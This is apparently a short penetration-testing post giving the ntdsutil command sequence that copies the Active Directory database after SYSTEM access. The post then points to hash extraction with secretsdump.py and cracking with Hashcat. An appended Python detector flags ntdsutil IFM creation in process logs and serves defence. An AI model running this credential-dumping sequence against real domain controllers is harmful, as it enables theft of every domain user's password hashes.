Okay, you’ve gotten SYSTEM access on your Windows target, and now you want to get the goodies in Active Directory. Here’s the ultra-short version:
Open PowerShell and enter:
ntdsutil
Activate Instance ntds
ifm
create full c:\bak_fldr
quit
quit
Check out this video, which details creating the NTDS backup, extracting data with secretsdump.py (https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py), and cracking password hashes with Hashcat.
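A defender-side counterpart to the procedure above, added here as an example (it is not from the original post or its video): a Python triage of process-creation records for ntdsutil.exe launches. The event records and their field names are constructed for the example. The interactive form shown above leaves only a bare ntdsutil command line, so it can be flagged for review but not confirmed as IFM creation from this log source alone.

```python
import ntpath
import re

# Constructed process-creation records (field names are assumptions loosely
# modelled on process-creation logging; hosts, users and paths are made up).
SAMPLE_EVENTS = [
    {"host": "DC01", "user": "NT AUTHORITY\\SYSTEM",
     "image": "C:\\Windows\\System32\\ntdsutil.exe", "cmdline": "ntdsutil"},
    {"host": "DC01", "user": "CORP\\backupsvc",
     "image": "C:\\Windows\\System32\\ntdsutil.exe",
     "cmdline": 'ntdsutil "ac i ntds" "ifm" "create full c:\\bak_fldr" q q'},
    {"host": "DC02", "user": "CORP\\admin1",
     "image": "C:\\Windows\\System32\\ntdsutil.exe",
     "cmdline": 'ntdsutil "activate instance ntds" "files" "info" quit quit'},
    {"host": "WS07", "user": "CORP\\alice",
     "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

# ntdsutil accepts abbreviated commands ("ac i ntds", "cr fu"), so match "ifm"
# followed by any "cr..." verb and capture the drive-letter path that follows.
# Paths containing spaces are only captured up to the first space.
IFM_CREATE = re.compile(
    r'\bifm\b.*\bcr\w*\s+(?:[a-z]+\s+)*?(?P<path>[a-z]:\\[^"\s]*)', re.I)
FIRST_TOKEN = re.compile(r'^\s*(?:"[^"]*"|\S+)\s*')  # the program name itself


def triage(event):
    """Return a finding for an ntdsutil.exe launch, or None for anything else."""
    if ntpath.basename(event["image"]).lower() != "ntdsutil.exe":
        return None
    finding = {"host": event["host"], "user": event["user"], "path": None}
    args = FIRST_TOKEN.sub("", event["cmdline"], count=1)
    match = IFM_CREATE.search(args)
    if match:
        finding.update(severity="high", path=match.group("path"),
                       reason="IFM media creation on the command line")
    elif not args:
        # Subcommands typed at the ntdsutil prompt never reach this log source.
        finding.update(severity="review",
                       reason="interactive session, subcommands not visible")
    else:
        finding.update(severity="info", reason="ntdsutil run without IFM create")
    return finding


def scan(events):
    """Triage every record and keep only the ntdsutil findings."""
    return [f for f in map(triage, events) if f]
```

Findings marked "review" need a second data source to confirm or dismiss, such as new ntds.dit and registry hive copies appearing in an unexpected folder on the domain controller.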